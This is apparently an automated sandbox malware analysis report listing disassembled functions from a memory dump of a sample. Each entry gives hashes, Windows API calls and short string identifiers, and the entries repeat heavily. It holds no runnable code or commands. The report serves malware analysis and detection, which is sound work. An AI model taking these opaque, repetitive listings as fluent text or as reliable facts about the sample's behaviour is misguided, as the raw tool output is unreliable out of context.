                                                                                                                                                                                                                                    • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                                                                                                    • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                                                                    • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                                                                    • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                                                                                                                                    • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MetricsSystem$PlacementWindow
                                                                                                                                                                                                                                    • String ID: AE
                                                                                                                                                                                                                                    • API String ID: 3548547718-685266089
                                                                                                                                                                                                                                    • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                    • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                                                                                                    • String ID: @@@@$History
                                                                                                                                                                                                                                    • API String ID: 1872909662-685208920
                                                                                                                                                                                                                                    • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                                                                    • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                                                                    • String ID: AE$"
                                                                                                                                                                                                                                    • API String ID: 568519121-1989281832
                                                                                                                                                                                                                                    • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                                                                    • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                                                                                                    • Opcode ID: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d52be591b3ab58c36f6074870949877e32a333ebc1fa33980d7036594a0e8467
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                                                                                    • Opcode ID: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da8fee05c6b158577436834c58d8e0793f5841ead652fa3e76a227b487c5742d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                                                                                                                                                    • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                                                                    • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
